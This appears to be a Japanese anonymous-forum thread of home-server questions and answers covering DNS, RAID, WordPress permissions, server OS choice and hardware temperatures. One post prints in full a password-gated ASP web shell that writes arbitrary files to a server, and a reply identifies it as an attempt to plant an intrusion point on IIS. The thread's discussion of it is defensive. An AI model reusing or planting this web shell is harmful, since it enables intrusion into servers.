条件として、

1.無料
2.ドメイン名に'-'が使える
3.OS ubuntuなんですが、DiCEのようなアプリが対応している

という所はありませんか?詳しいことは分かっていないので、そのURLたたけば自宅マシンの
IPにアクセスできるくらいで十分だと思っているのですが、サービスが新規登録は止めているとか、
有料もありと書いてあったのが、有料しかなくなってるとかばかりで、何かあれば教えてほしいです。

basic認証使えるところならwgetで対応できるが、それじゃダメか？
個人的にはno-ipかmydnsだな

>>161
わかりました。ちょっとそれでやってみます。ありがとうございました。

>>159
ありがとうございました。
hostの書き換えをしてみたのですが、これだと自分でHP見ただけでアクセス解析に反映されてしまいますし、なかなか大変でした。
ありがとうございました

ちょっと質問。
今度ファイルサーバ自作するんだが、ドライブ構成を
システムドライブ→SSD
データドライブ　→HDD１Tx2台
バックアップドライブHDD2Tｘ１
で考えてるのだけどこの構成だとRAIDは使えないよね？
データドライブだけでもRAID0にしたいのですが・・・。

ディスク2台あるならできるだろ。

って、ファイルサーバで RAID0 って何の冗談だ。

>>164
ドライブ以外のハードウェア構成やOSなど次第としかいえない。

なんだか、RAID0を行う人がいるけど、理由が聞きたい。
０と１じゃ、全く違うものだが。

で、RAID0って、そんなに性能（スピード）を求めているのかね？

HDD余ってるからとか？
いやでも無いな、片方死んだらアウトだからないな

>>168
だよね。
なんで0にするのか分からん。
0+1なら分かるが。

>>160
.comドメインが年９８０円で取れるのに、苦労して何でＤＤＮＳに拘るの？
.comドメインでもＤＤＮＳ使えるよ。お名前とか。

自分で持てば規制も何もﾈｰﾜ　まじ俺って天才だわ

>>169
1+0の方がいいんじゃない？

>>170
価値観の違いだろ。
たかが千円、されど千円。

おしえていただけますでしょうか?

WEBとDNSとメールのサーバーを立てようと思っています。
現在フレッツ光でOCNです。
プロバイダを変更して固定IPを取得する予定です。
WEBは大丈夫だと思っていますが、DNSとメールがよくわかりません。

最低限の構成でいいのですが、固定IPは一つでできますでしょうか?

アップローダに変なファイルを送りつけてくる中国人がいるんだが、
これなにをやろうとしてるんだ？


<%
on error resume next
%>
<%
if request("pass")="hxhack" then '
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='6'> <input "%><%="type='submit' value='xx廨喘芦畠殊霞垢醤....'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="yes"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="輝念猟周揃抄:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="荷恬狼由葎:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEB捲暦匂井云葎:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="捲暦匂議IP葎:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>

>>174
ADSL+固定IPv4アドレス1つで全部やってる。サーバも1台のみ。
但しWin系サーバだとどうなるかは知らない。BSD，Linuxなら
問題ない。

>>176
お返事ありがとうございます。

現在のOCN契約2年縛りが終わり次第interlinkかasahiネットで固定IPを一つ取得する予定です。

OSはCentOSでいこうと思っています。
Bindの設定は社内の内部向けゾーンファイルを書いて問題なく運用できているのでネットで勉強しながら設定してみようと思います。
メールはsendmailよりqmailのほうがいいという事を聞いた事があり、なんとか自力で設定してみようと思います。
ありがとうございました。

>177
qmailはもう事実上開発止まってるよ。
昔は使っていたけど、postfixに乗り換えた。

>>175
Windowsのサーバ(IIS)に対して侵入箇所を作ろうとしている。
対象のサーバがWindows以外か、もしくはアップロードしたファイルを
スクリプトとして実行させないような設定をしていれば、何も問題はない。

ブログのWEB鯖に使うだけなら充分かなと古いネットブック（メモリ2Gに増設したmini9）に
最小構成からhttpdとphpとmysql-serverだけいれてWordPress動かしたくらいなんだけど
まだ記事もないインストール直後なのにF5キー5連打くらいでCPU使用率100%悲鳴あげてる・・・
さすがにここまで酷いとは思わんかったなぁ

>>177
DNSは、サーバ構築自体はIPアドレス1つでも問題ないけど、
もし独自ドメインの対外サーバ(DNSコンテンツサーバ)として運用するなら
普通はレジストラに2台のDNSサーバ(IPアドレス2つ)を登録する必要があるよ。

qmailは>>178にもあるけど、開発終わってるオリジナルは正直使いものにならない。
パッチをたくさん当てるか、有志が別途管理しているやつを使うか。

177です。
>>181
お返事ありがとうございます。

プライマリサーバーを自サーバーにして
セカンダリサーバーを無料サービスで運用するというのは可能でしょうか?

wordpressへ接続できません。

/var/wwwをルートにして
そこにwordpressを入れました

http://192.168.1.22/wordpress/wp-admin/install.phpでインストール出来るはずなのですがデータベースへの確立ができませんと怒られました。

ルートに適当はフォルダーを作成して
http://192.168.1.22 で閲覧できたので
apacheは出来てるみたいです。

PHPもphpinfo.phpをルートに置いて
http://192.168.1.22/phpinfo.php で確認出来ました。

MySQLでwordpressデータベースを作りwordpressの所有者も変更しました。

wordpress/wp-config.phpもMySQLの設定に合わせました。


どうしたらいいのでしょうか？

>>183
象形文字でしゃべってるようなそんな抽象的な説明をしてるから自分でも解決できないんだぜ
パソコンなんてチンプンカンプンですっていうＰＣオンチでももっとマシな聞き方をする
どうなることを期待して
お前自身が何をして
お前自身が何をした契機で
どんな現象が起きたのをお前自身の目で見たのか
正確に伝える努力をしたほうがいいそれだけでここで誰かが応えるまでもなく解決するかもな

>>183
答え出てるじゃないか
「データベースへの確立ができません」
MySQLのログ見てどこで蹴られてるのか見れば大体わかるだろ

環境とか書いてないから言えるのはそんだけだな

MySQLってポート開けんでいいの？

>>183　です

120413 19:09:50 [Note] Plugin 'FEDERATED' is disabled.
/usr/sbin/mysqld: Can't find file: './mysql/plugin.frm' (errno: 13)

120413 19:09:50 [ERROR] Can't open the mysql.plugin table. Please run mysql_upgrade to create it.

120413 19:09:50 InnoDB: Initializing buffer pool, size = 8.0M
120413 19:09:50 InnoDB: Completed initialization of buffer pool
120413
19:09:50 InnoDB: Operating system error number 13 in a file operation.
InnoDB: The error means mysqld does not have the access rights to
InnoDB: the directory.
InnoDB: File name ./ibdata1
InnoDB: File operation call: 'create'.
InnoDB: Cannot continue operation.

errorlogを確認したら上記記載されていました。

/usr/sbin/mysqld　に見つからないとログがありますが
実際に確認できました。

上記から分かることを教えていただけませんでしょうか。

Ubuntu 11.10 64bit

can't find file って怒られてるんだから、mysqldからは本当に見つからないんだよ、きっとね

エラーメッセージ追えよ

errno: 13
はPermission denied。sys/errno.hとかでも見てみて

http://192.168.1.22/wordpress でHP確認できたんだけど
これをローカル外に公開するにはどうしたらいいんだ・・・。

固定IP契約済みで、一応DDNSもある。

>>191
ポート開放でおｋ

>>192
してるんだが；；

http://192.168.1.22/wordpress　で開けたが
http://222.228.232.7/wordpress　では開けない・・・。

ポート80を開放したが。

apache2の設定がイマイチ理解できてないoh...

>>193
よくあるヘアピンNAT問題じゃなくて?

事故解決した。

なぜかローカル内のＰＣからだと全部エラー吐くけど
ローカル外のＰＣから接続したらBlog確認できた。

これの解決はどうしたらいいんでしょうか。

メインＰＣからBlogの投稿をしたいれす。

>>194
調べたらまさしくそれでした。

ちょっと調べてきます。

>>194
ここに粘着してて失礼・・・。

hosts書き換えでローカル内からアクセスできた！

皆さん感謝です。
そして失礼します。

hosts

>>191

centos6を使ってて
mondo rescueで焼いたisoのdvdでバックアップしたんだけど
ユーザパスワードを入れたら何故かログインできず・・・
エラー？もでない・・・

で、わざと違うパスワードを入れると
承認されません！とエラーで入れず。

一旦消して再起動すると
画面右下にビックリマークがあってクリックしたら
『BOOT　messages』とあって
一つだけ気になる表示があり

Starting kdump: [FAILED]
とある。
[]の中の部分だけが赤い表示なんだけど
これが原因でしょうか？
これはどうやって改善できるのでしょうか？

50℃雰囲気中まで動作保証しているBBルータありませんか？
スイッチはあるんだけど。

むしろその表現が一般的かどうか質問したいわ

X58とZ77(68)について教えて下さい。

X58のメモリ帯域と、PCI帯域は
Z77(68)と比べてどういう風になっているのでしょうか。

独立しているVPNサーバーをネットワークのどこに設置するかという話なのですが
ググってみるとDMZに置けという話が引っかかったのですがその場合は内部ネットワークへのアクセスはいったいどういうことになるのでしょうか？
内部ルーター兼FWはDMZから内部への接続を全部拒否するようにしているのですがもしかしてこれに穴を開けておくと言うことなのでしょうか。

>>201
RTX810

>>204
・VPN経由で内部に認証なし/認証弱いプロトコルを許可する &
・VPNサーバがクラッキングされた場合を考慮
という場合を考えるなら
・内部に設置
・DMZに設置して内部への最低限の通信許可
なら後者の方が若干マシ、程度でしょう。

VPNサーバへのアクセス方法自体を工夫してVPNサーバ自体をセキュアにすべきかと。
(ポート番号を変えるとか、鍵必須にするとか)

本当にくだらない質問ですが、
レスポンスヘッダのServerをUnknownにするにはどうしたらよいでしょうか？

>>207
ServerSignature Off @ apache

web鯖起てるのに、64bitＯＳで組むか32bitＯＳで組むか迷ってます。
パフォーマンスかなり変わりますか？

ものすごくメモリを使うプロセスがあるとか、
ものすごく演算するプロセスがあるとか、
なら変わる。そこまで酷使しない過疎鯖ならどっちでもいい。

パフォーマンス以外の視点としては、
メモリ4GB以上積んでるなら64bitの方がきっといい。(特にWindows)
64bitなら大抵は32bitアプリも動く。(逆は無理)

>>208
ありがとうございます！

自宅鯖ではないのですが、Linuxでのサーバ管理を勉強したかったのでVPSを借りて見ました。
身内へ貸してドメイン持ち込みでバーチャルホストでの運用を想定しています。
コントロールパネル的なものを作成し、ドメイン変更手続きをしたら、
設定をApacheのconfファイルに反映して、Apacheを再起動という感じの仕組みを作ればよいでしょうか？

又貸し的な運用形態を大本の鯖レンタル元が許可していれば可能なんじゃないかな。
明示的に禁止しているところだと、ばれたらまずいかもしれない。

どうすればいいのか他人に聞かなきゃいけない、これから勉強するレベルの人間が
身内に鯖貸しするとか何考えてんだ。
運転免許持ってないけど教習所通いながらタクシー営業しますって言うようなもんだ。

>>213
レスありがとうございます。
さくらのVPSで再販も可能みたいなので問題ないと思います。
ttp://9jp.info/archives/2732
不特定多数ではなくてあくまでも身内ですので。
自宅鯖をレンタルしてる人でドメイン持ち込み認めてるところはどうしてるのか不思議で質問しました。
Apacheの再起動は時間がそんなにかからないとはいえ、
僅かな間アクセス不能になりますし、
自動化して運用してるところはそのへん気にしてないのかなぁと思いまして。

[やりたいこと]　内向きDNSを作成したい
[OS]CentOS6.2
[ソフト]BIND9（bind-9.7.3-8.P3.el6_2.2.i686）

[DNS&DHCP] 192.168,0.X ( hoge.com )
|
[Windows] 192.168.0.Y

[問題]　
DHCPはまともに動いている。
Windowsクライアントからhoge.comを正、逆引きできる。
（named.confのfowardを設定しているのだが、）
Googleなどのドメイン正、逆引きできなくなってしまっている。
Linuxでnslookupすると
** server can't find google.co.jp: NXDOMAIN
となる。
（正引きファイルに * IN A 192.168.0Xを入れればエラーが回避できるが、
google.co.jp.hoge.comを解決してしまう）

>>216
forwarderを設定してないからだろ。
設定を出せ。

おまえはちんこだせ

高梨は金をだせ
内田は一発ギャグをだせ

>>217
レスさんくす。 named.conf貼り付け
options {
directory "/var/named";
dump-file "/var/named/data/cache_dump.db";
statistics-file "/var/named/data/named_stats.txt";
memstatistics-file "/var/named/data/named_mem_stats.txt";
allow-query { localhost; localnets; };
recursion yes;
forward only;
forwarders {
DNS1つ目
DNS2つ目
};
managed-keys-directory "/var/named/dynamic";
};
logging {
channel default_debug {
file "data/named.run";
severity dynamic;
};
};
view "internal" {
match-clients { localhost; localnets; };
recursion yes;
zone "." IN {
type hint;
file "named.ca";
};
include "/etc/named.rfc1912.zones";
include "/etc/named.root.key";
zone "hoge.com" {
type master;
file "/var/named/hoge.com.db";
allow-update { none; };
};
zone "0.168.192.in-addr.arpa" {
type master;
file "/var/named/0.168.192.in-addr.arpa.db";
allow-update { none; };
};
};

forward するんだから zone "." はいらない。

>>220
レスサンクス。
zone "."　なくしたけど結果は変わらなかったです。

>>219
"view internal {}" 内にforwardとforwardersを記述すべきでは。

>>212
クラスタリングすればおｋ

>>219
たびたびレスサンクス。
> "view internal {}" 内にforwardとforwardersを記述すべきでは。
zone "." のあるなし、ともにやってみたけどだめでした。
（相変わらず** server can't find google.co.jp: NXDOMAIN）

DNS上でdigコマンドでも実験してみたけど、引けない。

dig @192.168.0.100 yahoo.co.jp
; <<>> DiG 9.7.3-P3-RedHat-9.7.3-8.P3.el6_2.2 <<>> @192.168.0.100 yahoo.co.jp
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 23421
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;yahoo.co.jp. IN A

;; Query time: 17 msec
;; SERVER: 192.168.0.100#53(192.168.0.100)
;; WHEN: Mon Aug 8 22:12:39 2011
;; MSG SIZE rcvd: 29

>>224
> status: SERVFAIL
って言ってるんだから、サーバ側のログに原因が出てるだろ。

お前はちんこ出せっていってるだろ。

お前等もちんこ出せよ。
↓

>>225
レスサンクス、、、　今エラーでググってる。
//コマンド
# dig @192.168.0.X yaoo.co.jp
//ログ
Aug 9 12:04:51 localhost named[7152]: error (no valid RRSIG) resolving 'jp/DS/IN': サーバーDNS1#53
Aug 9 12:04:51 localhost named[7152]: error (no valid RRSIG) resolving 'jp/DS/IN': サーバーDNS2#53
Aug 9 12:04:51 localhost named[7152]: error (no valid DS) resolving 'yaoo.co.jp/A/IN': サーバーDNS2#53
Aug 9 12:04:51 localhost named[7152]: validating @0xb5901698: jp SOA: bad cache hit (jp/DS)
Aug 9 12:04:51 localhost named[7152]: error (broken trust chain) resolving 'yaoo.co.jp/A/IN': サーバーDNS1#53

ipconfig /flushdns

>>227
forwardersで指定したDNSサーバが、DNSSECに対応してないんではないかな。
dnssec-validation noを指定するか、もしくは対応しているDNSサーバ
(たとえばgoogle public dnsとか)に変えれ。

>>228
レスサンクス。
Windowsクライアントで一応毎回やってました。
>>229
レスサンクス
dnssec-validation no　でうまくいきました。
まじありがとうございます。

DNSSECっていうのがあるっていうのは知っていたんですが、
中身をぜんぜん理解していませんでした。

自作PCが趣味といっただけで鯖構築を大学から依頼されたんだが…
2008r2とWHS2011どちらを入れるべきだろう？
「そんな質問をしている程度ならWHS2011にしろ」と言われそうだが、
WHS2011には制限(特にHDDの2TB縛り)が多いのがネック。
これから勉強を始めるなら2008R2のがよい？
WHS2011が2008R2より優れている点はあるのか？

用途はファイル鯖が主で、クライアント側はすべてWindows7 64bit
なお、ライセンスは大学からもらえるそうなので気にしなくていいらしい。

>>231
板違い

>>231
クライアントの台数と負荷予想くらいはわからないとピンキリ過ぎて困るんじゃないかな。
俺なら予算だけもぎ取って業者に丸投げするけど。

>>1
>自宅サーバ全般に関する質問スレッドです。
>※注意：仕事で使うサーバーはスレ違いです。

>>232、>>233
クライアントの台数は5台くらいだから、WHS2011でも一応大丈夫
確かに研究室で使うわけだが、研究データのやりとりが主な用途ではなく、
みんなで撮った動画とかを共有する
負荷もそんなたいしたことないと思う

要はホームサーバー的な使い方なんだ

>>234
単純にファイル共有だけの機能ならバックアップ手段は別に用意する前提で
QNAPの4台以上刺さる業務用NASとAPCのUPSでいいんじゃない？

わかっているなら、聞くなよ

>>235
NASもいいと思うんだが、Atomに抵抗あるんだ
HDDも4個以上搭載可能なやつになると、結構お高いし

JX-FM500B ←大量のホットスワップベイ
h77 pro4-M ←SATAの多いM-ATXマザー
Celeron G530 ←Atomの数倍の性能を3000円で

みたいな構成で考えてる
OS代は考慮せず…ということで頼む

>>236
いいんじゃね？
どこで使おうと用途が自宅鯖と変わらんわけだし

Windowsなのにはなんか理由あるの？

>>239
technet？かなんかでライセンスがもらえるみたいなんだ
あと俺がWindowsしか使ったことがないのと、クライアントが
全部Windowsだからなんとなーく親和性がいいのかな？という気がしたくらい

>>240
technetで貰えるライセンスは実務につかっちゃダメだぞ。評価版扱いだったはず。

>>240
OS代を考慮しなきゃならんな。
ファイル鯖が目的ならWHS2011でいいと思うけどな。
2008R2はDSP版買うとしても高いし、そんなに高機能なものは求めて無さそうだし。
妥協できない部分があるならともかく。

これから勉強するんであれば、いっそLinuxに手を出してもいいんじゃないかな、と思うけど。
とりあえずsambaで問題なくうちは色々やってるよ。
アップデートのための計画停止のアナウンスやら実施やらは面倒だし。

んと、結論としては2008R2の方が全てにおいて機能が上という認識でおｋ？
俺の使い方ではWHS2011で十分だとしても

WHS2011はDrive Extenderが使えないらしいし、
80GBのSSDへのインストールはめんどくさそうだから、
2008R2にしとくか…

なんか本屋いったら面白そうなのあったから買ってみた。
学生に2600円は痛かった＞＜；
http://coin.nikkeibp.co.jp/coin/itpro-s/book/dtl/nnw049.html

ついでにこっちも並んでたが5kなんて出費できませんｗｗｗ
http://coin.nikkeibp.co.jp/coin/itpro-s/book/dtl/nnw050.html

>>244
聞いておいてそれかい、どうでもいいけどライセンスはちゃんと買えよ。
あと何かしら運用するための入門書くらいは買っとけ。たぶん必要になる。

別にサーバOSじゃなくてもよさそう
XPでいいじゃん

>>246
それかいって言われても、誰も俺の質問に答えてくれてないんだが

PC関係の雑誌って買ったこと無いんだよな
ネットで調べた方が楽で安い気がして

>>248
サーバOSに関してはあんまり情報ないと思うけどな？
評価用ライセンスがあるなら使えば分かるが、マネージャが統合化されてて予備知識も無しに運用するのはかなり難しい。
一番情報が乗ってるMSのサイトいけばわかるけど、用語の中の用語を検索するなんてザラだし。
ためしにADで出来ることを調べてみるといい。知らない単語がたくさん出て意味不明になること請け合いだ。
あと買うのは雑誌じゃない、どっちかというと専門書。

まあそれはおいといて、
＞2008r2とWHS2011どちらを入れるべきだろう？
サーバOS触ったこと無いならWHS以外ありえない。しかも目的はファイルサーバなら尚更。
＞これから勉強を始めるなら2008R2のがよい？
お前が何をしたいのかによる。サーバOSの機能はクライアントOSとは比べ物にならないくらい複雑。
RDSとかWindows特有の機能をフルに使うようなシーンを想定していないならぶっちゃけお勧めしない。
＞WHS2011が2008R2より優れている点はあるのか？
用途が違うものに優劣をつけることがそもそも間違いだがシンプルでホームサーバに特化した仕様になっている。
つまり、お前の用途にはぴったり。

つーか、勉強用のサーバは仮想化で別に用意しとけ。
仮に環境を破壊してもすぐにロールバックできるし、本番環境に影響しない。
あとやけに2TBに拘るが、それは本当に必要か？とりあえず〜程度で考えてるなら間違いなく不要な機能だぞ。

その程度の目的なら業務用NASの方が絶対いいって。
>>249が言ってるけど目的以外の機能が山程ついていて過剰だしそれ使うための勉強で日が暮れる。

自分はファイル共有だけのためにWS2003でAD導入してドツボにはまったし
ディスク冗長化機能自体がWS単体だとソフトウェア頼みだから性能出なくて悩む。

そりゃ2008の方が高機能だろうが、片手間じゃ辛いと思うけどね。
ファイルサーバのファイルのアクセス権しっかりしたいからユーザ作るよ
やっぱりこう使うとADがあった方がいいから、構築しといて。
あ、バックアップはしっかりね。
待機系立ち上げれる？よろしくね。
Windowsの大きなパッチがあったけど。検証した？
「検証が完了しましたので○月○日 xx:yy より再起動いたします」
このサーバってさー、仮想化できない？

と、やる事が爆発的に増えていく。
一回動かして、後はほとんど弄らない、のであれば、2008は要らん。

おまいら、研究データでもない動画や写真の共有なんて
YouTubeとかSNSサービスとかで十分だろ

>>252
そういう用途であればDropBoxは便利だよね。

他の方も言ってるけど、QNAPかシーカスのNASで済む話しでは？
ユーザー管理出来るし、ホスト側のOS気にする必要ないし。
出先で鯖にアクセスしたいなら、PPTPやOpenVPN使えばいいし。

ここって落ちてるの？？？

http://centossrv.com/

>>255
Fedoraのほうも死んでるから、閉鎖したんじゃね？
確証は無いけどな。

>>256
２、３ヶ月前まで閲覧できたけど
お気に入り整理してたらこれ出てきてクリックしたら
アレ？　って感じだったから。

403エラーだったけど、
一閲覧者の俺がアクセス拒否ってのはまずないから・・・
となると管理人が何らかのトラブル？

残念・・・

>>257
3月18日までは更新されていたようだし、昨日までは閲覧できたようだね。
サーバ側の設定ミスじゃないかな。
http://webcache.googleusercontent.com/search?q=cache%3Acentossrv.com
> このページは 2012年4月19日 04:53:46 GMT に取得されたものです。
> 最終更新日： 2012.03.18

>>258
サンキュー！

こっちは生存してるttp://centos.org/

ってことで、鯖が意識不明になっているんでは内科医。
ドメイン名失効ってわけではなさそうだし

wordpress及び、phpMyAdminへアクセスできません。

Ubuntu 11.04 32bit環境です。

Apache2の動作確認として
http://192.168.1.24　を実行して
It works! を確認できました。

PHPの動作確認として
/var/www/にtest.phpをおいて
phoinfoの参照ができました。

とりあえずphpMyAdminへのアクセスをしたいです。

/var/www/phpMyAdmin　このような構成にしたのですが
何故かアクセスできません。

出てきたHTMLはサーバーエラーです。

chmod で弄る前は
Permission denied　でした。

恐らく権限関連だとおもうのですが・・・。

ls -l　の結果のせておきます。

-rw-r--r-- 1 root root 177 2012-04-20 21:49 index.html
drwxrwxrwx 10 root root 4096 2012-04-20 22:04 phpMyAdmin
-rw-r--r-- 1 tokumei tokumei 20 2012-04-20 22:45 test.php
drwxrwxrwx 5 tokumei tokumei 4096 2012-04-20 22:09 wordpress

連投もしわけないです。

これで最後にします。

chmod 644 /var/www/phpMyAdminにしたところ

You don't have permission to access /phpMyAdmin/ on this server.

と表示されました。

なぜエラーログを見ない

うっ・・・。

>>264

error logを確認したところ
[Fri Apr 20 23:29:43 2012] [crit] [client 192.168.1.21]
(13)Permission denied: /var/www/phpMyAdmin/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable

以上のエラーログがありました。

まずこのスレに報告するんじゃなく、てめーの頭に報告しろよ

>>266
答えられないんだったら引っ込んでろよｗｗｗｗ

っという私にも答えられません。

>>265
まずは「unable to check htaccess file, ensure it is readable」でググってみようぜ。
あと/var/www以下は通常はhttpdの子プロセスが動作してるユーザ(apacheとか)
の権限で読み出せる必要があるぞ。

chown -R apache:apache /var/www
ですか？わかりません

/var/www のオーナを変更するなんてとんでもないわー
/var/www にサブディレクトリを掘って、そっちをドキュメントルートにしてからオーナを変えるべきジャネ？

YahooBBで自宅鯖とか遅すぎて死ねる？

>>268
apache2.confの/var/wwwの部分です。

DocumentRoot /var/www
<Directory /var/www/>
Options FollowSymLinks
AllowOverride All
</Directory>

<Directory />
Options Indexes FollowSymLinks MultiViews
AllowOverride none
Order allow,deny
allow from all
</Directory>


/var/wwwのls -lです。

-rw-r--r-- 1 root root 177 4\u6708 22 00:15 index.html
-rw-rw-r-- 1 luis luis 20 4\u6708 22 00:43 test.php
drwxrwxrwx 5 root luis 4096 4\u6708 22 00:32 wordpress



ちなみに、ここのサイトを参考にしましたができませんでした。
phpinfoや、it works!の動作は確認してます。

>>249
亀でスマン、丁寧に教えてくれて感謝する

確かにサーバOSの情報少ないよな
俺の質問が検索でいまいち解決できなかったのも結局はそういうことだと思う

2TBに拘るのは、JX-FM500Bに搭載できるHDDの台数が限られてるから(最大10台)。
バックアップ取るとしたら実質5台分の容量しか使えない。
今後データが増えてHDDが追加できなくなれば交換することになるだろうから、
2TBの制限がどうしても不満なんだ

とはいえ、俺の用途ではWHS2011がぴったりだし、2008R2で使える機能を使うためにはかなり勉強が必要みたいだな
素直にWHS2011にして、2008R2はVMwareで試してみるわ

>>250
業務用NASはどうしてもコスパが悪く思えるんだ
※この場合のコスパはハード面での意味。
初心者でもそこそこ使えるソフト面、サポート面等を考慮すると妥当なんだろうけど

>>251
今の俺ではそういった機能の何が便利なのかよく分からん
2008は不要そうだな、それだけは分かった

お前らありがとう

もしかして2TBの制限ってHDD1台あたりの壁の事を言ってるの？
それ2003ベースの初代WHSの話でWHS2011は2008がベースだから制限無いよ

>>274
2TB超のパーティションはHDDイメージとしてバックアップできないらしい
だから自動的に2TBでパーティションが切られると。
手動で3TBを1パーティションに設定することもできるが、
素直に２TBで切っていた方が無難…とどこかで読んだ

HDDイメージとしてバックアップすることの利便性は理解できていないんだが、
多分そうやってバックアップしないとややこしくなる…と読み取っている

俺の認識に間違いがあればご指摘くだされ

# chown tokumei.tokumei /var/www/phpMyAdmin
でとりあえず動くと思うけども。"phpMyAdmin インストール"でぐぐったらいっぱい出てくるけど…
こいつらは全部使い物にならない情報ばっかなのかな。phpMyAdmin使いってアホばっかなのか?

お先の事考えて04WebServerからApacheに乗り換えた
リアルタイムのアクセス情報とか過去1時間のアクセス数とか見れなくて死にたい

え? ほんとにそう思うなら死ねばいいかもｗ

>>275
イメージ化しておくとレストアするだけで完全に元の環境に戻せる。
OS入れ直して、ソフト入れ直して、ファイル戻して〜の手間が省けるし
バックアップした時点の環境にできるから戻し忘れが発生しない。

まあWS2008R2も同等の制約はあるみたいだけどね。
ファイルだけバックアップする分には問題ないし、
サードパーティ性のソフト探したら良いもの見つかるかも知れないし。
そこは調査してどうするか決めればいいよ。

Windows系サーバー用でオンラインのシステムイメージがとれるフリーのソフトなんてあったかなぁ
Linuxとか*BSDとかOpenIndianaとかもっと選択肢があるような気がするんだけど

wordpressでSimple twitterていうプラグインと
WP to Twitterていうプラグインを有効にすると

PHP5以降から使用できるよ！っと言われるんだけど
どうしたらよろしくて？

PHP5.3.6 WP3.3.2

PHP5以降→PHP5.1.5って意味だからバージョン落とさないとだめだぬ

>>279
なるほど。
だとすると、イメージ化の利点はシステムドライブにはあるが、
データドライブにはほぼ無いと考えておｋ？

システムドライブ(128GBのSSDにする予定)だけHDDイメージとしてバックアップをとり、
データドライブ(3〜4TBのHDDにする予定)はファイルバックアップにすればいいかな

鯖の温度が気になる
Pentium G630Tでmini-itx機を組んだがCore温度が40度なんだ
ちなみにケースファン無しのアルミケースを使っている
この温度が高いのか低いのかよくわからん
参考までに皆の鯖機のフォームファクターと温度を教えてはくれまいか？

phpMyAdmin設置するときは必ずディレクトリ名変えろよ。
自分しか使わないような鯖でも毎日のように攻撃される。

サーバー運営してるんだけど
パフォーマンス状態がどんなもんか一目で分かるソフトとかない？

top と vmstat でやってるけど・・・。

例えばcactiとか？

>>284なんだけれど、
誰も自分の鯖のフォームファクタと温度を把握してないとでもいうのか…？
皆そのへん無頓着なのかね…。

アンケートとりたいなら別のところでしてくれ。

空冷/水冷なら外気温以下にはどうやっても下がらないから
居住地域や住居環境や季節に思いっきり影響されるし、
CPUだけに注目しても数十W〜百数十Wまで幅があるし、
動的周波数運用ならCPU負荷で温度変わるし、
余裕がある匡体でも静音一番冷却二番かもしれないし。

まあ40℃なら低い方じゃないかとは思うが、CPUのデータシートも確認しては。

>>288
mrtgで把握してるよ。
CPUとHDDの温度。
あとファンのスピード。


あと、気温と湿度を取りたいが、センサーが高すぎる。
気温だけでも、簡単に取れる方法はないか画策中だが、案が無い。

>>284
今入院中で鯖のコンソールにアクセスできないので
わからんが、40℃なら十分冷えてる。但しアイドル時の
値だろうから、高負荷時の温度に気を付けるべきだろう。
びっくりする位上がるから。

>>291
少し工作は要るが、Arduino オススメ。
完成品のボードが3000円くらい、温度センサが300円くらい。
入出力あるから、頑張ればエアコンのON/OFFなんかもできる。

自宅サーバを安全に自信を持って運用出来るスキルを
つける為に、学習しなくてはならない事はなんでしょうか？

また、自宅に固定IDを引くにあたりお勧めの回線がありましたら教えて下さい。

>>294
イーモバでおｋ

↑無線環境で不安定とちゃうのぉ？


UQ-Wimax とかってちなみにどうでしょう？

固定回線引くまでも無いというかDDNSで十分というか

>>291
ストロベリー・リナックスってとこで4000円でUSBRHっていうUSB温湿度計が売ってる。
4000円が高いというのであれば自作しかないが湿度センサどうする悩むと思う。

無人の局はそれで温度監視してるが特に不安定なところは無い。

自分でハンダ出来れば1000円安く買えるが、ハウジングが1000円する。

>>294
まずそんな質問では何も反応がかえってこないだろうということを学習すべきでしょうな

>>294
マジレスすると、
・使用するOSの内部もある程度わかる程度の詳しい知識。
・TCP/IPの詳しい知識。
・電気の常識。
・プログラミング経験。
・セキュリティ基礎知識。

...ってところかな。
ま、これは最初から完璧を目指した場合の話で、
身の丈にあった範囲で少しずつ始めれば良いかと。
その範囲が自分で判断できないと危ないけどな。

回線は安定が何より大事。無線は余程の理由がない限り避けるべき。WiMAXは一日一回位強制切断されるらしい。安定していればADSLで十分。光回線に使う予算を固定アドレスに回したほうが良い。

>>284
CeleronE3400、ATXのP35マザーとRAM4GB、冷却は最初の簡易水冷H5Oを使用。
エアフロー系ケース(鉄)で冷却Fanはそれなりに実装し、CPUのPWM制御を分岐させて他も制御。
PDC_E2220(333x9)で組んで、CPUのみCDC_E3400(333x9)に変更で現在に至る。
コア温度： 検出下限温度が34度@Speedfan読み。真冬の室温7度で電源ON直後でも34度。
負荷かかってCPU95%くらいで、室温35度なら CPU53度前後を推移。
真冬仕様では、CPUファンは常時LOWに変更、5台のHDDは冷却無しで26度前後になり、
電源FanをCPUのPWMで制御するとかなり静かだと思う。今はHDD冷却Fan回してるけど。
冬仕様では若干の負圧、それ以外ではファン回して常に正圧になるようバランス取り。
とはいえ、ファンレスに拘る連中から見れば騒音鯖だろうな。あ、俺は冷却症の患者だと思う。
ここまで書けばいいのかな?

吉良吉影

>>300
マジレスありがとうございます。
ご指摘いただいた内容を真摯に受け止め学習を続ける事にします。


これまで共用サーバをレンタルしていましたが
制限事項が多く、専用サーバへ乗り換えを考えましたが
料金が高く自宅サーバとして運用した方が効率的であると考えた経緯でした。

>>303
自宅鯖のスペック次第だが、電気代は意外とバカにならんよ。

Ivyの報告待ちだな。
負荷と消費電力のバランスor例のグリスで夏場に落ちたら話になんねぇーからな

>電気の知識
ここは笑うところだと思うがどうか

ところで、DVWAというphpそふとの、「Brute Force」ってとこは
どうやって試せばいいんでしょうか？検証例を教えてください
